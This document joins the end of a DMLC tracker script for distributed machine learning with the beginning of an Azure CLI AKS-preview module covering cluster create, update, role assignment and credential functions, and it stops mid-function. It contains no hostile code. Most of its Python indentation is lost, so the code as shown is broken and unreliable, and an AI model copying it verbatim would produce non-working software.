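#   DMLC_TRACKER_URI=10.0.0.5
#   DMLC_TRACKER_PORT=9091
# and then connects back to this socket to be assigned a rank.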
class PSTracker(object):
"""
Tracker module for PS
"""
def __init__(self, hostIP, cmd, port=9091, port_end=9999, envs=None):
"""
Starts the PS scheduler
"""
self.cmd = cmd
if cmd is None:
return
envs = {} if envs is None else envs
self.hostIP = hostIP
sock = socket.socket(get_family(hostIP), socket.SOCK_STREAM)
for port in range(port, port_end):
try:
sock.bind(('', port))
self.port = port
sock.close()
break
except socket.error:
continue
env = os.environ.copy()
env['DMLC_ROLE'] = 'scheduler'
env['DMLC_PS_ROOT_URI'] = str(self.hostIP)
env['DMLC_PS_ROOT_PORT'] = str(self.port)
for k, v in envs.items():
env[k] = str(v)
self.thread = Thread(
target=(lambda: subprocess.check_call(self.cmd, env=env, shell=True, executable='/bin/bash')), args=())
        self.thread.daemon = True
self.thread.start()
def join(self):
if self.cmd is not None:
            while self.thread.is_alive():
self.thread.join(100)
def slave_envs(self):
if self.cmd is None:
return {}
else:
return {'DMLC_PS_ROOT_URI': self.hostIP,
'DMLC_PS_ROOT_PORT': self.port}
def alive(self):
if self.cmd is not None:
            return self.thread.is_alive()
else:
return False
def get_host_ip(hostIP=None):
if hostIP is None or hostIP == 'auto':
hostIP = 'ip'
if hostIP == 'dns':
hostIP = socket.getfqdn()
elif hostIP == 'ip':
from socket import gaierror
try:
hostIP = socket.gethostbyname(socket.getfqdn())
except gaierror:
            logging.warning('gethostbyname(socket.getfqdn()) failed... trying on hostname()')
hostIP = socket.gethostbyname(socket.gethostname())
if hostIP.startswith("127."):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# doesn't have to be reachable
s.connect(('10.255.255.255', 1))
hostIP = s.getsockname()[0]
return hostIP
def submit(nworker, nserver, fun_submit, hostIP='auto', pscmd=None):
if nserver == 0:
pscmd = None
envs = {'DMLC_NUM_WORKER' : nworker,
'DMLC_NUM_SERVER' : nserver}
hostIP = get_host_ip(hostIP)
if nserver == 0:
rabit = RabitTracker(hostIP=hostIP, nslave=nworker)
envs.update(rabit.slave_envs())
rabit.start(nworker)
if rabit.alive():
fun_submit(nworker, nserver, envs)
else:
pserver = PSTracker(hostIP=hostIP, cmd=pscmd, envs=envs)
envs.update(pserver.slave_envs())
if pserver.alive():
fun_submit(nworker, nserver, envs)
if nserver == 0:
rabit.join()
else:
pserver.join()
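# Illustrative sketch (not part of the original script): `fun_submit` is the
# launcher-specific callback; a minimal local launcher might look roughly like
# this (the worker command is hypothetical).
#
#   def fun_submit(nworker, nserver, envs):
#       for _ in range(nworker + nserver):
#           env = os.environ.copy()
#           env.update({k: str(v) for k, v in envs.items()})
#           subprocess.Popen(['python', 'worker.py'], env=env)
#
#   submit(nworker=2, nserver=0, fun_submit=fun_submit, hostIP='auto')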
def start_rabit_tracker(args):
"""Standalone function to start rabit tracker.
Parameters
----------
args: arguments to start the rabit tracker.
"""
envs = {'DMLC_NUM_WORKER' : args.num_workers,
'DMLC_NUM_SERVER' : args.num_servers}
rabit = RabitTracker(hostIP=get_host_ip(args.host_ip), nslave=args.num_workers)
envs.update(rabit.slave_envs())
rabit.start(args.num_workers)
sys.stdout.write('DMLC_TRACKER_ENV_START\n')
# simply write configuration to stdout
for k, v in envs.items():
sys.stdout.write('%s=%s\n' % (k, str(v)))
sys.stdout.write('DMLC_TRACKER_ENV_END\n')
sys.stdout.flush()
rabit.join()
def main():
"""Main function if tracker is executed in standalone mode."""
parser = argparse.ArgumentParser(description='Rabit Tracker start.')
parser.add_argument('--num-workers', required=True, type=int,
                        help='Number of worker processes to be launched.')
parser.add_argument('--num-servers', default=0, type=int,
                        help='Number of server processes to be launched. Only used in PS jobs.')
parser.add_argument('--host-ip', default=None, type=str,
                        help=('Host IP address; this is only needed ' +
'if the host IP cannot be automatically guessed.'))
parser.add_argument('--log-level', default='INFO', type=str,
choices=['INFO', 'DEBUG'],
help='Logging level of the logger.')
args = parser.parse_args()
fmt = '%(asctime)s %(levelname)s %(message)s'
if args.log_level == 'INFO':
level = logging.INFO
elif args.log_level == 'DEBUG':
level = logging.DEBUG
else:
raise RuntimeError("Unknown logging level %s" % args.log_level)
logging.basicConfig(stream=sys.stdout, format=fmt, level=level)
if args.num_servers == 0:
start_rabit_tracker(args)
else:
raise RuntimeError("Do not yet support start ps tracker in standalone mode.")
if __name__ == "__main__":
main()
|
custom.py
|
# pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import base64
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from math import isnan
import colorama # pylint: disable=import-error
import yaml # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import (
ArgumentUsageError,
InvalidArgumentValueError,
)
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.commands.client_factory import (
get_mgmt_service_client,
get_subscription_id,
)
from azure.cli.core.util import (
get_file_json,
in_cloud_console,
read_file_content,
sdk_no_wait,
shell_safe_json_parse,
)
from azure.graphrbac.models import (
ApplicationCreateParameters,
KeyCredential,
PasswordCredential,
ServicePrincipalCreateParameters,
)
from dateutil.parser import parse # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from knack.log import get_logger
from knack.prompting import NoTTYException, prompt_pass, prompt_y_n
from knack.util import CLIError
from msrestazure.azure_exceptions import CloudError
from six.moves.urllib.error import URLError # pylint: disable=import-error
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azext_aks_preview._client_factory import CUSTOM_MGMT_AKS_PREVIEW
from ._client_factory import (
cf_agent_pools,
cf_container_registry_service,
cf_nodepool_snapshots_client,
cf_mc_snapshots_client,
cf_storage,
get_auth_management_client,
get_graph_rbac_management_client,
get_msi_client,
get_resource_by_name,
)
from ._consts import (
ADDONS,
ADDONS_DESCRIPTIONS,
CONST_ACC_SGX_QUOTE_HELPER_ENABLED,
CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME,
CONST_AZURE_POLICY_ADDON_NAME,
CONST_CONFCOM_ADDON_NAME,
CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME,
CONST_INGRESS_APPGW_ADDON_NAME,
CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID,
CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME,
CONST_INGRESS_APPGW_SUBNET_CIDR,
CONST_INGRESS_APPGW_SUBNET_ID,
CONST_INGRESS_APPGW_WATCH_NAMESPACE,
CONST_KUBE_DASHBOARD_ADDON_NAME,
CONST_MANAGED_IDENTITY_OPERATOR_ROLE,
CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID,
CONST_MONITORING_ADDON_NAME,
CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID,
CONST_MONITORING_USING_AAD_MSI_AUTH,
CONST_OPEN_SERVICE_MESH_ADDON_NAME,
CONST_ROTATION_POLL_INTERVAL,
CONST_SCALE_DOWN_MODE_DELETE,
CONST_SCALE_SET_PRIORITY_REGULAR,
CONST_SCALE_SET_PRIORITY_SPOT,
CONST_SECRET_ROTATION_ENABLED,
CONST_SPOT_EVICTION_POLICY_DELETE,
CONST_VIRTUAL_NODE_ADDON_NAME,
CONST_VIRTUAL_NODE_SUBNET_NAME,
)
from ._helpers import (
_trim_fqdn_name_containing_hcp,
)
from ._podidentity import (
_ensure_managed_identity_operator_permission,
_ensure_pod_identity_addon_is_enabled,
_fill_defaults_for_pod_identity_profile,
_update_addon_pod_identity,
)
from ._resourcegroup import get_rg_location
from ._roleassignments import (
add_role_assignment,
build_role_scope,
create_role_assignment,
resolve_object_id,
resolve_role_id,
)
from .addonconfiguration import (
add_ingress_appgw_addon_role_assignment,
add_monitoring_role_assignment,
add_virtual_node_role_assignment,
enable_addons,
ensure_container_insights_for_monitoring,
ensure_default_log_analytics_workspace_for_monitoring,
sanitize_loganalytics_ws_resource_id,
)
from .maintenanceconfiguration import (
aks_maintenanceconfiguration_update_internal,
)
from .vendored_sdks.azure_mgmt_preview_aks.v2022_03_02_preview.models import (
AgentPool,
AgentPoolUpgradeSettings,
ContainerServiceStorageProfileTypes,
CreationData,
KubeletConfig,
LinuxOSConfig,
ManagedClusterAddonProfile,
ManagedClusterHTTPProxyConfig,
ManagedClusterPodIdentity,
ManagedClusterPodIdentityException,
PowerState,
Snapshot,
ManagedClusterSnapshot,
SysctlConfig,
UserAssignedIdentity,
)
logger = get_logger(__name__)
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
    Waits for a bit, then opens a URL. Useful for waiting for a proxy to come up and then opening the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
    t = threading.Thread(target=wait_then_open, args=(url,))
t.daemon = True
t.start()
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
# added in python 2.7.13 and 3.6
return ssl.SSLContext(ssl.PROTOCOL_TLS)
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal',
value=0.1 * x, total_val=1.0)
try:
create_service_principal(
cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation',
value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
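# Worked example (added note): _get_default_dns_prefix('myCluster', 'my_resource.group',
# '8ecadfc9-0000-0000-0000-000000000000') returns 'myCluster-myresourcegroup-8ecadf'.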
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
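# Illustrative note (added): acsServicePrincipal.json maps subscription ids to
# the stored credentials, roughly
#   {"<subscription-id>": {"client_secret": "...", "service_principal": "<app-id>"}}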
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
key_usage=key_usage, start_date=start_date, end_date=end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError(
'specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(
filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError(
'When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
    if not any([ids, assignee, role, resource_group_name, scope, yes]):
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
_re_user_assigned_identity_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
flags=re.IGNORECASE)
def _get_user_assigned_identity(cli_ctx, resource_id):
resource_id = resource_id.lower()
match = _re_user_assigned_identity_resource_id.search(resource_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
identity_name = match.group(3)
msi_client = get_msi_client(cli_ctx, subscription_id)
try:
identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("Identity {} not found.".format(resource_id))
raise CLIError(ex.message)
return identity
raise CLIError(
"Cannot parse identity name from provided resource id {}.".format(resource_id))
_re_snapshot_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.containerservice/snapshots/(.*)',
flags=re.IGNORECASE)
_re_mc_snapshot_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.containerservice/managedclustersnapshots/(.*)',
flags=re.IGNORECASE)
def _get_snapshot(cli_ctx, snapshot_id):
snapshot_id = snapshot_id.lower()
match = _re_snapshot_resource_id.search(snapshot_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
snapshot_name = match.group(3)
snapshot_client = cf_nodepool_snapshots_client(
cli_ctx, subscription_id=subscription_id)
try:
snapshot = snapshot_client.get(resource_group_name, snapshot_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise InvalidArgumentValueError(
"Snapshot {} not found.".format(snapshot_id))
raise CLIError(ex.message)
return snapshot
raise InvalidArgumentValueError(
"Cannot parse snapshot name from provided resource id {}.".format(snapshot_id))
def _get_cluster_snapshot(cli_ctx, snapshot_id):
snapshot_id = snapshot_id.lower()
match = _re_mc_snapshot_resource_id.search(snapshot_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
snapshot_name = match.group(3)
snapshot_client = cf_mc_snapshots_client(
cli_ctx, subscription_id=subscription_id)
try:
snapshot = snapshot_client.get(resource_group_name, snapshot_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise InvalidArgumentValueError(
"Managed cluster snapshot {} not found.".format(snapshot_id))
raise CLIError(ex.message)
return snapshot
raise InvalidArgumentValueError(
"Cannot parse snapshot name from provided resource id {}.".format(snapshot_id))
def aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
):
from azure.cli.command_modules.acs.custom import _aks_browse
return _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser,
listen_address,
listen_port,
CUSTOM_MGMT_AKS_PREVIEW,
)
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def aks_maintenanceconfiguration_list(
cmd,
client,
resource_group_name,
cluster_name
):
return client.list_by_managed_cluster(resource_group_name, cluster_name)
def aks_maintenanceconfiguration_show(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.get(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_delete(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.delete(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_add(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
for config in configs:
if config.name == config_name:
raise CLIError("Maintenance configuration '{}' already exists, please try a different name, "
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
def aks_maintenanceconfiguration_update(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
found = False
for config in configs:
if config.name == config_name:
found = True
break
if not found:
raise CLIError("Maintenance configuration '{}' doesn't exist."
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
# pylint: disable=unused-argument,too-many-locals
def aks_create(cmd,
client,
resource_group_name,
name,
ssh_key_value,
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
enable_vmss=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
os_sku=None,
enable_fips_image=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
pod_cidrs=None,
service_cidrs=None,
ip_families=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_managed_outbound_ipv6_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
nat_gateway_managed_outbound_ip_count=None,
nat_gateway_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
min_count=None,
max_count=None,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
node_zones=None,
zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
enable_pod_security_policy=False,
node_resource_group=None,
uptime_sla=False,
attach_acr=None,
enable_private_cluster=False,
private_dns_zone=None,
enable_managed_identity=True,
fqdn_subdomain=None,
disable_public_fqdn=False,
api_server_authorized_ip_ranges=None,
aks_custom_headers=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_aad=False,
enable_azure_rbac=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
enable_sgxquotehelper=False,
kubelet_config=None,
linux_os_config=None,
http_proxy_config=None,
assign_identity=None,
auto_upgrade_channel=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
# NOTE: for workload identity flags, we need to know if it's set to True/False or not set (None)
enable_workload_identity=None,
enable_encryption_at_host=False,
enable_ultra_ssd=False,
edge_zone=None,
enable_secret_rotation=False,
disable_disk_driver=None,
disable_file_driver=None,
disable_snapshot_controller=None,
rotation_poll_interval=None,
disable_local_accounts=False,
no_wait=False,
assign_kubelet_identity=None,
workload_runtime=None,
gpu_instance_profile=None,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
snapshot_id=None,
cluster_snapshot_id=None,
enable_oidc_issuer=False,
host_group_id=None,
crg_id=None,
message_of_the_day=None,
enable_azure_keyvault_kms=False,
azure_keyvault_kms_key_id=None,
yes=False):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
from azure.cli.command_modules.acs._consts import DecoratorEarlyExitException
from azure.cli.command_modules.acs.decorator import AKSParamDict
from .decorator import AKSPreviewCreateDecorator
# decorator pattern
aks_create_decorator = AKSPreviewCreateDecorator(
cmd=cmd,
client=client,
raw_parameters=AKSParamDict(raw_parameters),
resource_type=CUSTOM_MGMT_AKS_PREVIEW,
)
try:
# construct mc profile
mc = aks_create_decorator.construct_mc_preview_profile()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to create a real managed cluster
return aks_create_decorator.create_mc_preview(mc)
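# Illustrative usage sketch (not part of the module): this function backs
# commands such as
#
#   az aks create --resource-group MyRG --name MyCluster \
#       --node-count 3 --generate-ssh-keys
#
# where the CLI layer maps the flags onto aks_create's parameters before the
# decorator constructs and sends the ManagedCluster payload.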
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_managed_outbound_ipv6_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
nat_gateway_managed_outbound_ip_count=None,
nat_gateway_idle_timeout=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None,
uptime_sla=False,
no_uptime_sla=False,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
aks_custom_headers=None,
auto_upgrade_channel=None,
enable_managed_identity=False,
assign_identity=None,
assign_kubelet_identity=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
disable_pod_identity=False,
# NOTE: for workload identity flags, we need to know if it's set to True/False or not set (None)
enable_workload_identity=None,
disable_workload_identity=None,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
enable_disk_driver=None,
disable_disk_driver=None,
enable_file_driver=None,
disable_file_driver=None,
enable_snapshot_controller=None,
disable_snapshot_controller=None,
disable_local_accounts=False,
enable_local_accounts=False,
enable_public_fqdn=False,
disable_public_fqdn=False,
yes=False,
tags=None,
nodepool_labels=None,
windows_admin_password=None,
enable_azure_rbac=False,
disable_azure_rbac=False,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
enable_oidc_issuer=False,
http_proxy_config=None,
enable_azure_keyvault_kms=False,
azure_keyvault_kms_key_id=None):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
from azure.cli.command_modules.acs._consts import DecoratorEarlyExitException
from azure.cli.command_modules.acs.decorator import AKSParamDict
from .decorator import AKSPreviewUpdateDecorator
# decorator pattern
aks_update_decorator = AKSPreviewUpdateDecorator(
cmd=cmd,
client=client,
raw_parameters=AKSParamDict(raw_parameters),
resource_type=CUSTOM_MGMT_AKS_PREVIEW,
)
try:
# update mc profile
mc = aks_update_decorator.update_mc_preview_profile()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to update the real managed cluster
return aks_update_decorator.update_mc_preview(mc)
# pylint: disable=unused-argument
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
    This works around a quirk of the Python SDK's behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
admin=False,
user='clusterUser',
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
overwrite_existing=False,
context_name=None,
public_fqdn=False,
credential_format=None):
credentialResults = None
serverType = None
if public_fqdn:
serverType = 'public'
if credential_format:
credential_format = credential_format.lower()
if admin:
raise InvalidArgumentValueError("--format can only be specified when requesting clusterUser credential.")
if admin:
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name, serverType)
else:
if user.lower() == 'clusteruser':
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name, serverType, credential_format)
elif user.lower() == 'clustermonitoringuser':
credentialResults = client.list_cluster_monitoring_user_credentials(
resource_group_name, name, serverType)
else:
raise CLIError("The user is invalid.")
if not credentialResults:
